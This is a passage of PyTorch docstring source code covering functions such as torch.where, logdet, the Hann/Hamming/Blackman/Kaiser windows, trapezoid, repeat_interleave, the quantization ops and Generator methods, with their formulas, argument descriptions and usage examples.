The tensors :attr:`condition`, :attr:`x`, :attr:`y` must be :ref:`broadcastable <broadcasting-semantics>`.
.. note::
Currently valid scalar and tensor combinations are
1. Scalar of floating dtype and torch.double
2. Scalar of integral dtype and torch.long
3. Scalar of complex dtype and torch.complex128
Arguments:
condition (BoolTensor): When True (nonzero), yield x, otherwise yield y
x (Tensor or Scalar): value (if :attr:`x` is a scalar) or values selected at indices
where :attr:`condition` is ``True``
y (Tensor or Scalar): value (if :attr:`y` is a scalar) or values selected at indices
where :attr:`condition` is ``False``
Returns:
Tensor: A tensor of shape equal to the broadcasted shape of :attr:`condition`, :attr:`x`, :attr:`y`
Example::
>>> x = torch.randn(3, 2)
>>> y = torch.ones(3, 2)
>>> x
tensor([[-0.4620, 0.3139],
[ 0.3898, -0.7197],
[ 0.0478, -0.1657]])
>>> torch.where(x > 0, x, y)
tensor([[ 1.0000, 0.3139],
[ 0.3898, 1.0000],
[ 0.0478, 1.0000]])
>>> x = torch.randn(2, 2, dtype=torch.double)
>>> x
tensor([[ 1.0779, 0.0383],
[-0.8785, -1.1089]], dtype=torch.float64)
>>> torch.where(x > 0, x, 0.)
tensor([[1.0779, 0.0383],
[0.0000, 0.0000]], dtype=torch.float64)
.. function:: where(condition) -> tuple of LongTensor
:noindex:
``torch.where(condition)`` is identical to
``torch.nonzero(condition, as_tuple=True)``.
.. note::
See also :func:`torch.nonzero`.
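Example::
    >>> # the single-argument form returns the indices of the True entries, as a tuple
    >>> torch.where(torch.tensor([False, True, True]))
    (tensor([1, 2]),)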
""")
add_docstr(torch.logdet,
r"""
logdet(input) -> Tensor
Calculates log determinant of a square matrix or batches of square matrices.
.. note::
Result is ``-inf`` if :attr:`input` has zero determinant, and is ``nan`` if
:attr:`input` has negative determinant.
.. note::
Backward through :meth:`logdet` internally uses SVD results when :attr:`input`
is not invertible. In this case, double backward through :meth:`logdet` will
be unstable when :attr:`input` doesn't have distinct singular values. See
:meth:`~torch.svd` for details.
Arguments:
input (Tensor): the input tensor of size ``(*, n, n)`` where ``*`` is zero or more
batch dimensions.
Example::
>>> A = torch.randn(3, 3)
>>> torch.det(A)
tensor(0.2611)
>>> torch.logdet(A)
tensor(-1.3430)
>>> A = torch.randn(3, 2, 2)
>>> A
tensor([[[ 0.9254, -0.6213],
[-0.5787, 1.6843]],
[[ 0.3242, -0.9665],
[ 0.4539, -0.0887]],
[[ 1.1336, -0.4025],
[-0.7089, 0.9032]]])
>>> A.det()
tensor([1.1990, 0.4099, 0.7386])
>>> A.det().log()
tensor([ 0.1815, -0.8917, -0.3031])
""")
add_docstr(torch.slogdet, r"""
slogdet(input) -> (Tensor, Tensor)
Alias for :func:`torch.linalg.slogdet`
""")
add_docstr(torch.pinverse, r"""
pinverse(input, rcond=1e-15) -> Tensor
Alias for :func:`torch.linalg.pinv`
""")
add_docstr(torch.hann_window,
"""
hann_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Hann window function.
.. math::
w[n] = \frac{1}{2}\ \left[1 - \cos \left( \frac{2 \pi n}{N - 1} \right)\right] =
\sin^2 \left( \frac{\pi n}{N - 1} \right),
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.hann_window(L, periodic=True)`` equal to
``torch.hann_window(L + 1, periodic=False)[:-1]``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
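Example::
    >>> # a periodic window of length 4; the values follow the formula above
    >>> torch.hann_window(4)
    tensor([0.0000, 0.5000, 1.0000, 0.5000])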
""".format(**factory_common_args))
add_docstr(torch.hamming_window,
"""
hamming_window(window_length, periodic=True, alpha=0.54, beta=0.46, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Hamming window function.
.. math::
w[n] = \alpha - \beta\ \cos \left( \frac{2 \pi n}{N - 1} \right),
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.hamming_window(L, periodic=True)`` equal to
``torch.hamming_window(L + 1, periodic=False)[:-1]``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
.. note::
This is a generalized version of :meth:`torch.hann_window`.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
alpha (float, optional): The coefficient :math:`\alpha` in the equation above
beta (float, optional): The coefficient :math:`\beta` in the equation above
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.bartlett_window,
"""
bartlett_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Bartlett window function.
.. math::
w[n] = 1 - \left| \frac{2n}{N-1} - 1 \right| = \begin{cases}
\frac{2n}{N - 1} & \text{if } 0 \leq n \leq \frac{N - 1}{2} \\
2 - \frac{2n}{N - 1} & \text{if } \frac{N - 1}{2} < n < N \\
\end{cases},
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.bartlett_window(L, periodic=True)`` equal to
``torch.bartlett_window(L + 1, periodic=False)[:-1]``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.blackman_window,
"""
blackman_window(window_length, periodic=True, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Blackman window function.
.. math::
w[n] = 0.42 - 0.5 \cos \left( \frac{2 \pi n}{N - 1} \right) + 0.08 \cos \left( \frac{4 \pi n}{N - 1} \right)
where :math:`N` is the full window size.
The input :attr:`window_length` is a positive integer controlling the
returned window size. :attr:`periodic` flag determines whether the returned
window trims off the last duplicate value from the symmetric window and is
ready to be used as a periodic window with functions like
:meth:`torch.stft`. Therefore, if :attr:`periodic` is true, the :math:`N` in
above formula is in fact :math:`\text{window\_length} + 1`. Also, we always have
``torch.blackman_window(L, periodic=True)`` equal to
``torch.blackman_window(L + 1, periodic=False)[:-1]``.
.. note::
If :attr:`window_length` :math:`=1`, the returned window contains a single value 1.
""" + r"""
Arguments:
window_length (int): the size of returned window
periodic (bool, optional): If True, returns a window to be used as periodic
function. If False, return a symmetric window.
Keyword args:
{dtype} Only floating point types are supported.
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
Returns:
Tensor: A 1-D tensor of size :math:`(\text{{window\_length}},)` containing the window
""".format(**factory_common_args))
add_docstr(torch.kaiser_window, """
kaiser_window(window_length, periodic=True, beta=12.0, *, dtype=None, \
layout=torch.strided, device=None, requires_grad=False) -> Tensor
""" + r"""
Computes the Kaiser window with window length :attr:`window_length` and shape parameter :attr:`beta`.
Let I_0 be the zeroth order modified Bessel function of the first kind (see :func:`torch.i0`) and
``N = L - 1`` if :attr:`periodic` is False and ``L`` if :attr:`periodic` is True,
where ``L`` is the :attr:`window_length`. This function computes:
.. math::
out_i = I_0 \left( \beta \sqrt{1 - \left( {\frac{i - N/2}{N/2}} \right) ^2 } \right) / I_0( \beta )
Calling ``torch.kaiser_window(L, B, periodic=True)`` is equivalent to calling
``torch.kaiser_window(L + 1, B, periodic=False)[:-1]``.
The :attr:`periodic` argument is intended as a helpful shorthand
to produce a periodic window as input to functions like :func:`torch.stft`.
.. note::
If :attr:`window_length` is one, then the returned window is a single element tensor containing a one.
""" + r"""
Args:
window_length (int): length of the window.
periodic (bool, optional): If True, returns a periodic window suitable for use in spectral analysis.
If False, returns a symmetric window suitable for use in filter design.
beta (float, optional): shape parameter for the window.
Keyword args:
{dtype}
layout (:class:`torch.layout`, optional): the desired layout of returned window tensor. Only
``torch.strided`` (dense layout) is supported.
{device}
{requires_grad}
""".format(**factory_common_args))
add_docstr(torch.vander,
"""
vander(x, N=None, increasing=False) -> Tensor
""" + r"""
Generates a Vandermonde matrix.
The columns of the output matrix are elementwise powers of the input vector :math:`x^{{(N-1)}}, x^{{(N-2)}}, ..., x^0`.
If increasing is True, the order of the columns is reversed :math:`x^0, x^1, ..., x^{{(N-1)}}`. Such a
matrix with a geometric progression in each row is named for Alexandre-Theophile Vandermonde.
Arguments:
x (Tensor): 1-D input tensor.
N (int, optional): Number of columns in the output. If N is not specified,
a square array is returned :math:`(N = len(x))`.
increasing (bool, optional): Order of the powers of the columns. If True,
the powers increase from left to right, if False (the default) they are reversed.
Returns:
Tensor: Vandermonde matrix. If increasing is False, the first column is :math:`x^{{(N-1)}}`,
the second :math:`x^{{(N-2)}}` and so forth. If increasing is True, the columns
are :math:`x^0, x^1, ..., x^{{(N-1)}}`.
Example::
>>> x = torch.tensor([1, 2, 3, 5])
>>> torch.vander(x)
tensor([[ 1, 1, 1, 1],
[ 8, 4, 2, 1],
[ 27, 9, 3, 1],
[125, 25, 5, 1]])
>>> torch.vander(x, N=3)
tensor([[ 1, 1, 1],
[ 4, 2, 1],
[ 9, 3, 1],
[25, 5, 1]])
>>> torch.vander(x, N=3, increasing=True)
tensor([[ 1, 1, 1],
[ 1, 2, 4],
[ 1, 3, 9],
[ 1, 5, 25]])
""".format(**factory_common_args))
add_docstr(torch.unbind,
r"""
unbind(input, dim=0) -> seq
Removes a tensor dimension.
Returns a tuple of all slices along a given dimension, already without it.
Arguments:
input (Tensor): the tensor to unbind
dim (int): dimension to remove
Example::
>>> torch.unbind(torch.tensor([[1, 2, 3],
...                            [4, 5, 6],
...                            [7, 8, 9]]))
(tensor([1, 2, 3]), tensor([4, 5, 6]), tensor([7, 8, 9]))
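>>> # dim=1 slices along columns instead
>>> torch.unbind(torch.tensor([[1, 2], [3, 4]]), dim=1)
(tensor([1, 3]), tensor([2, 4]))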
""")
add_docstr(torch.combinations,
r"""
combinations(input, r=2, with_replacement=False) -> seq
Compute combinations of length :math:`r` of the given tensor. The behavior is similar to
python's `itertools.combinations` when `with_replacement` is set to `False`, and
`itertools.combinations_with_replacement` when `with_replacement` is set to `True`.
Arguments:
input (Tensor): 1D vector.
r (int, optional): number of elements to combine
with_replacement (boolean, optional): whether to allow duplication in combination
Returns:
Tensor: A tensor equivalent to converting all the input tensors into lists, doing
`itertools.combinations` or `itertools.combinations_with_replacement` on these
lists, and finally converting the resulting list into a tensor.
Example::
>>> import itertools
>>> a = [1, 2, 3]
>>> list(itertools.combinations(a, r=2))
[(1, 2), (1, 3), (2, 3)]
>>> list(itertools.combinations(a, r=3))
[(1, 2, 3)]
>>> list(itertools.combinations_with_replacement(a, r=2))
[(1, 1), (1, 2), (1, 3), (2, 2), (2, 3), (3, 3)]
>>> tensor_a = torch.tensor(a)
>>> torch.combinations(tensor_a)
tensor([[1, 2],
[1, 3],
[2, 3]])
>>> torch.combinations(tensor_a, r=3)
tensor([[1, 2, 3]])
>>> torch.combinations(tensor_a, with_replacement=True)
tensor([[1, 1],
[1, 2],
[1, 3],
[2, 2],
[2, 3],
[3, 3]])
""")
add_docstr(torch.trapezoid,
r"""
trapezoid(y, x=None, *, dx=None, dim=-1) -> Tensor
Computes the `trapezoidal rule <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ along
:attr:`dim`. By default the spacing between elements is assumed to be 1, but
:attr:`dx` can be used to specify a different constant spacing, and :attr:`x` can be
used to specify arbitrary spacing along :attr:`dim`.
Assuming :attr:`y` is a one-dimensional tensor with elements :math:`{y_0, y_1, ..., y_n}`,
the default computation is
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{1}{2} (y_i + y_{i-1})
\end{aligned}
When :attr:`dx` is specified the computation becomes
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{\Delta x}{2} (y_i + y_{i-1})
\end{aligned}
effectively multiplying the result by :attr:`dx`. When :attr:`x` is specified,
assuming :attr:`x` is also a one-dimensional tensor with
elements :math:`{x_0, x_1, ..., x_n}`, the computation becomes
.. math::
\begin{aligned}
\sum_{i = 1}^{n-1} \frac{(x_i - x_{i-1})}{2} (y_i + y_{i-1})
\end{aligned}
When :attr:`x` and :attr:`y` have the same size, the computation is as described above and no broadcasting is needed.
The broadcasting behavior of this function is as follows when their sizes are different. For both :attr:`x`
and :attr:`y`, the function computes the difference between consecutive elements along
dimension :attr:`dim`. This effectively creates two tensors, `x_diff` and `y_diff`, that have
the same shape as the original tensors except their lengths along the dimension :attr:`dim` is reduced by 1.
After that, those two tensors are broadcast together to compute final output as part of the trapezoidal rule.
See the examples below for details.
.. note::
The trapezoidal rule is a technique for approximating the definite integral of a function
by averaging its left and right Riemann sums. The approximation becomes more accurate as
the resolution of the partition increases.
Arguments:
y (Tensor): Values to use when computing the trapezoidal rule.
x (Tensor): If specified, defines spacing between values as specified above.
Keyword arguments:
dx (float): constant spacing between values. If neither :attr:`x` or :attr:`dx`
are specified then this defaults to 1. Effectively multiplies the result by its value.
dim (int): The dimension along which to compute the trapezoidal rule.
The last (inner-most) dimension by default.
Examples::
>>> # Computes the trapezoidal rule in 1D, spacing is implicitly 1
>>> y = torch.tensor([1, 5, 10])
>>> torch.trapezoid(y)
tensor(10.5)
>>> # Computes the same trapezoidal rule directly to verify
>>> (1 + 10 + 10) / 2
10.5
>>> # Computes the trapezoidal rule in 1D with constant spacing of 2
>>> # NOTE: the result is the same as before, but multiplied by 2
>>> torch.trapezoid(y, dx=2)
21.0
>>> # Computes the trapezoidal rule in 1D with arbitrary spacing
>>> x = torch.tensor([1, 3, 6])
>>> torch.trapezoid(y, x)
28.5
>>> # Computes the same trapezoidal rule directly to verify
>>> ((3 - 1) * (1 + 5) + (6 - 3) * (5 + 10)) / 2
28.5
>>> # Computes the trapezoidal rule for each row of a 3x3 matrix
>>> y = torch.arange(9).reshape(3, 3)
>>> y
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> torch.trapezoid(y)
tensor([ 2., 8., 14.])
>>> # Computes the trapezoidal rule for each column of the matrix
>>> torch.trapezoid(y, dim=0)
tensor([ 6., 8., 10.])
>>> # Computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with the same arbitrary spacing
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([1, 3, 6])
>>> torch.trapezoid(y, x)
tensor([5., 5., 5.])
>>> # Computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with different arbitrary spacing per row
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([[1, 2, 3], [1, 3, 5], [1, 4, 7]])
>>> torch.trapezoid(y, x)
tensor([2., 4., 6.])
""")
add_docstr(torch.trapz,
r"""
trapz(y, x, *, dim=-1) -> Tensor
Alias for :func:`torch.trapezoid`.
""")
add_docstr(torch.cumulative_trapezoid,
r"""
cumulative_trapezoid(y, x=None, *, dx=None, dim=-1) -> Tensor
Cumulatively computes the `trapezoidal rule <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_
along :attr:`dim`. By default the spacing between elements is assumed to be 1, but
:attr:`dx` can be used to specify a different constant spacing, and :attr:`x` can be
used to specify arbitrary spacing along :attr:`dim`.
For more details, please read :func:`torch.trapezoid`. The difference between :func:`torch.trapezoid`
and this function is that, :func:`torch.trapezoid` returns a value for each integration,
where as this function returns a cumulative value for every spacing within the integration. This
is analogous to how `.sum` returns a value and `.cumsum` returns a cumulative sum.
Arguments:
y (Tensor): Values to use when computing the trapezoidal rule.
x (Tensor): If specified, defines spacing between values as specified above.
Keyword arguments:
dx (float): constant spacing between values. If neither :attr:`x` or :attr:`dx`
are specified then this defaults to 1. Effectively multiplies the result by its value.
dim (int): The dimension along which to compute the trapezoidal rule.
The last (inner-most) dimension by default.
Examples::
>>> # Cumulatively computes the trapezoidal rule in 1D, spacing is implicitly 1.
>>> y = torch.tensor([1, 5, 10])
>>> torch.cumulative_trapezoid(y)
tensor([3., 10.5])
>>> # Computes the same trapezoidal rule directly up to each element to verify
>>> (1 + 5) / 2
3.0
>>> (1 + 10 + 10) / 2
10.5
>>> # Cumulatively computes the trapezoidal rule in 1D with constant spacing of 2
>>> # NOTE: the result is the same as before, but multiplied by 2
>>> torch.cumulative_trapezoid(y, dx=2)
tensor([6., 21.])
>>> # Cumulatively computes the trapezoidal rule in 1D with arbitrary spacing
>>> x = torch.tensor([1, 3, 6])
>>> torch.cumulative_trapezoid(y, x)
tensor([6., 28.5])
>>> # Computes the same trapezoidal rule directly up to each element to verify
>>> ((3 - 1) * (1 + 5)) / 2
6.0
>>> ((3 - 1) * (1 + 5) + (6 - 3) * (5 + 10)) / 2
28.5
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 matrix
>>> y = torch.arange(9).reshape(3, 3)
>>> y
tensor([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> torch.cumulative_trapezoid(y)
tensor([[ 0.5, 2.],
[ 3.5, 8.],
[ 6.5, 14.]])
>>> # Cumulatively computes the trapezoidal rule for each column of the matrix
>>> torch.cumulative_trapezoid(y, dim=0)
tensor([[ 1.5, 2.5, 3.5],
[ 6.0, 8.0, 10.0]])
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with the same arbitrary spacing
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([1, 3, 6])
>>> torch.cumulative_trapezoid(y, x)
tensor([[2., 5.],
[2., 5.],
[2., 5.]])
>>> # Cumulatively computes the trapezoidal rule for each row of a 3x3 ones matrix
>>> # with different arbitrary spacing per row
>>> y = torch.ones(3, 3)
>>> x = torch.tensor([[1, 2, 3], [1, 3, 5], [1, 4, 7]])
>>> torch.cumulative_trapezoid(y, x)
tensor([[1., 2.],
[2., 4.],
[3., 6.]])
""")
add_docstr(torch.repeat_interleave,
r"""
repeat_interleave(input, repeats, dim=None, *, output_size=None) -> Tensor
Repeat elements of a tensor.
.. warning::
This is different from :meth:`torch.Tensor.repeat` but similar to ``numpy.repeat``.
Args:
{input}
repeats (Tensor or int): The number of repetitions for each element.
repeats is broadcasted to fit the shape of the given axis.
dim (int, optional): The dimension along which to repeat values.
By default, use the flattened input array, and return a flat output
array.
Keyword args:
output_size (int, optional): Total output size for the given axis
(e.g. sum of repeats). If given, it will avoid stream synchronization
needed to calculate the output shape of the tensor.
Returns:
Tensor: Repeated tensor which has the same shape as input, except along the given axis.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> x.repeat_interleave(2)
tensor([1, 1, 2, 2, 3, 3])
>>> y = torch.tensor([[1, 2], [3, 4]])
>>> torch.repeat_interleave(y, 2)
tensor([1, 1, 2, 2, 3, 3, 4, 4])
>>> torch.repeat_interleave(y, 3, dim=1)
tensor([[1, 1, 1, 2, 2, 2],
[3, 3, 3, 4, 4, 4]])
>>> torch.repeat_interleave(y, torch.tensor([1, 2]), dim=0)
tensor([[1, 2],
[3, 4],
[3, 4]])
>>> torch.repeat_interleave(y, torch.tensor([1, 2]), dim=0, output_size=3)
tensor([[1, 2],
[3, 4],
[3, 4]])
.. function:: repeat_interleave(repeats, *, output_size=None) -> Tensor
:noindex:
If the `repeats` is `tensor([n1, n2, n3, ...])`, then the output will be
`tensor([0, 0, ..., 1, 1, ..., 2, 2, ..., ...])` where `0` appears `n1` times,
`1` appears `n2` times, `2` appears `n3` times, etc.
""".format(**common_args))
add_docstr(torch.tile, r"""
tile(input, dims) -> Tensor
Constructs a tensor by repeating the elements of :attr:`input`.
The :attr:`dims` argument specifies the number of repetitions
in each dimension.
If :attr:`dims` specifies fewer dimensions than :attr:`input` has, then
ones are prepended to :attr:`dims` until all dimensions are specified.
For example, if :attr:`input` has shape (8, 6, 4, 2) and :attr:`dims`
is (2, 2), then :attr:`dims` is treated as (1, 1, 2, 2).
Analogously, if :attr:`input` has fewer dimensions than :attr:`dims`
specifies, then :attr:`input` is treated as if it were unsqueezed at
dimension zero until it has as many dimensions as :attr:`dims` specifies.
For example, if :attr:`input` has shape (4, 2) and :attr:`dims`
is (3, 3, 2, 2), then :attr:`input` is treated as if it had the
shape (1, 1, 4, 2).
.. note::
This function is similar to NumPy's tile function.
Args:
input (Tensor): the tensor whose elements to repeat.
dims (tuple): the number of repetitions per dimension.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> x.tile((2,))
tensor([1, 2, 3, 1, 2, 3])
>>> y = torch.tensor([[1, 2], [3, 4]])
>>> torch.tile(y, (2, 2))
tensor([[1, 2, 1, 2],
[3, 4, 3, 4],
[1, 2, 1, 2],
[3, 4, 3, 4]])
""")
add_docstr(torch.quantize_per_tensor,
r"""
quantize_per_tensor(input, scale, zero_point, dtype) -> Tensor
Converts a float tensor to a quantized tensor with given scale and zero point.
Arguments:
input (Tensor): float tensor or list of tensors to quantize
scale (float or Tensor): scale to apply in quantization formula
zero_point (int or Tensor): offset in integer value that maps to float zero
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
Has to be one of the quantized dtypes: ``torch.quint8``, ``torch.qint8``, ``torch.qint32``
Returns:
Tensor: A newly quantized tensor or list of quantized tensors.
Example::
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), 0.1, 10, torch.quint8)
tensor([-1., 0., 1., 2.], size=(4,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.1, zero_point=10)
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), 0.1, 10, torch.quint8).int_repr()
tensor([ 0, 10, 20, 30], dtype=torch.uint8)
>>> torch.quantize_per_tensor([torch.tensor([-1.0, 0.0]), torch.tensor([-2.0, 2.0])],
>>> torch.tensor([0.1, 0.2]), torch.tensor([10, 20]), torch.quint8)
(tensor([-1., 0.], size=(2,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.1, zero_point=10),
tensor([-2., 2.], size=(2,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.2, zero_point=20))
>>> torch.quantize_per_tensor(torch.tensor([-1.0, 0.0, 1.0, 2.0]), torch.tensor(0.1), torch.tensor(10), torch.quint8)
tensor([-1., 0., 1., 2.], size=(4,), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.10, zero_point=10)
""")
add_docstr(torch.quantize_per_channel,
r"""
quantize_per_channel(input, scales, zero_points, axis, dtype) -> Tensor
Converts a float tensor to a per-channel quantized tensor with given scales and zero points.
Arguments:
input (Tensor): float tensor to quantize
scales (Tensor): float 1D tensor of scales to use, size should match ``input.size(axis)``
zero_points (int): integer 1D tensor of offset to use, size should match ``input.size(axis)``
axis (int): dimension on which to apply per-channel quantization
dtype (:class:`torch.dtype`): the desired data type of returned tensor.
Has to be one of the quantized dtypes: ``torch.quint8``, ``torch.qint8``, ``torch.qint32``
Returns:
Tensor: A newly quantized tensor
Example::
>>> x = torch.tensor([[-1.0, 0.0], [1.0, 2.0]])
>>> torch.quantize_per_channel(x, torch.tensor([0.1, 0.01]), torch.tensor([10, 0]), 0, torch.quint8)
tensor([[-1., 0.],
[ 1., 2.]], size=(2, 2), dtype=torch.quint8,
quantization_scheme=torch.per_channel_affine,
scale=tensor([0.1000, 0.0100], dtype=torch.float64),
zero_point=tensor([10, 0]), axis=0)
>>> torch.quantize_per_channel(x, torch.tensor([0.1, 0.01]), torch.tensor([10, 0]), 0, torch.quint8).int_repr()
tensor([[ 0, 10],
[100, 200]], dtype=torch.uint8)
""")
add_docstr(torch.quantized_batch_norm,
r"""
quantized_batch_norm(input, weight=None, bias=None, mean, var, eps, output_scale, output_zero_point) -> Tensor
Applies batch normalization on a 4D (NCHW) quantized tensor.
.. math::
y = \frac{x - \mathrm{E}[x]}{\sqrt{\mathrm{Var}[x] + \epsilon}} * \gamma + \beta
Arguments:
input (Tensor): quantized tensor
weight (Tensor): float tensor that corresponds to the gamma, size C
bias (Tensor): float tensor that corresponds to the beta, size C
mean (Tensor): float mean value in batch normalization, size C
var (Tensor): float tensor for variance, size C
eps (float): a value added to the denominator for numerical stability.
output_scale (float): output quantized tensor scale
output_zero_point (int): output quantized tensor zero_point
Returns:
Tensor: A quantized tensor with batch normalization applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2, 2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_batch_norm(qx, torch.ones(2), torch.zeros(2), torch.rand(2), torch.rand(2), 0.00001, 0.2, 2)
tensor([[[[-0.2000, -0.2000],
[ 1.6000, -0.2000]],
[[-0.4000, -0.4000],
[-0.4000, 0.6000]]],
[[[-0.2000, -0.2000],
[-0.2000, -0.2000]],
[[ 0.6000, -0.4000],
[ 0.6000, -0.4000]]]], size=(2, 2, 2, 2), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=0.2, zero_point=2)
""")
add_docstr(torch.quantized_max_pool1d,
r"""
quantized_max_pool1d(input, kernel_size, stride=[], padding=0, dilation=1, ceil_mode=False) -> Tensor
Applies a 1D max pooling over an input quantized tensor composed of several input planes.
Arguments:
input (Tensor): quantized tensor
kernel_size (list of int): the size of the sliding window
stride (``list of int``, optional): the stride of the sliding window
padding (``list of int``, optional): padding to be added on both sides, must be >= 0 and <= kernel_size / 2
dilation (``list of int``, optional): The stride between elements within a sliding window, must be > 0. Default 1
ceil_mode (bool, optional): If True, will use ceil instead of floor to compute the output shape.
Defaults to False.
Returns:
Tensor: A quantized tensor with max_pool1d applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_max_pool1d(qx, [2])
tensor([[0.0000],
[1.5000]], size=(2, 1), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=1.5, zero_point=3)
""")
add_docstr(torch.quantized_max_pool2d,
r"""
quantized_max_pool2d(input, kernel_size, stride=[], padding=0, dilation=1, ceil_mode=False) -> Tensor
Applies a 2D max pooling over an input quantized tensor composed of several input planes.
Arguments:
input (Tensor): quantized tensor
kernel_size (``list of int``): the size of the sliding window
stride (``list of int``, optional): the stride of the sliding window
padding (``list of int``, optional): padding to be added on both sides, must be >= 0 and <= kernel_size / 2
dilation (``list of int``, optional): The stride between elements within a sliding window, must be > 0. Default 1
ceil_mode (bool, optional): If True, will use ceil instead of floor to compute the output shape.
Defaults to False.
Returns:
Tensor: A quantized tensor with max_pool2d applied.
Example::
>>> qx = torch.quantize_per_tensor(torch.rand(2, 2, 2, 2), 1.5, 3, torch.quint8)
>>> torch.quantized_max_pool2d(qx, [2,2])
tensor([[[[1.5000]],
[[1.5000]]],
[[[0.0000]],
[[0.0000]]]], size=(2, 2, 1, 1), dtype=torch.quint8,
quantization_scheme=torch.per_tensor_affine, scale=1.5, zero_point=3)
""")
add_docstr(torch.Generator,
r"""
Generator(device='cpu') -> Generator
Creates and returns a generator object that manages the state of the algorithm which
produces pseudo random numbers. Used as a keyword argument in many :ref:`inplace-random-sampling`
functions.
Arguments:
device (:class:`torch.device`, optional): the desired device for the generator.
Returns:
Generator: A torch.Generator object.
Example::
>>> g_cpu = torch.Generator()
>>> g_cuda = torch.Generator(device='cuda')
""")
add_docstr(torch.Generator.set_state,
r"""
Generator.set_state(new_state) -> void
Sets the Generator state.
Arguments:
new_state (torch.ByteTensor): The desired state.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu_other = torch.Generator()
>>> g_cpu.set_state(g_cpu_other.get_state())
""")
add_docstr(torch.Generator.get_state,
r"""
Generator.get_state() -> Tensor
Returns the Generator state as a ``torch.ByteTensor``.
Returns:
Tensor: A ``torch.ByteTensor`` which contains all the necessary bits
to restore a Generator to a specific point in time.
Example::
>>> g_cpu = torch.Generator()
>>> g_cpu.get_state()
""")
add_docstr(torch.Generator.manual_seed,
r"""
Generator.manual_seed(seed) -> Generator
Sets the seed for generating random numbers. Returns a `torch.Generator` object.
It is recommended to set a large seed, i.e. a number that has a good balance of 0
and 1 bits. Avoid having many 0 bits in the seed.
Arguments:
seed (int): The desired seed. Value must be within the inclusive range
`[-0x8000_0000_0000_0000, 0xffff_ffff_ffff_ffff]`. Otherwise, a RuntimeError
is raised. Negative inputs are remapped to positive values with the formula
`0xffff_ffff_ffff_ffff + seed`.
Returns:
Generator: A torch.Generator object.
Example::
>>> g_cpu = torch.Generator()
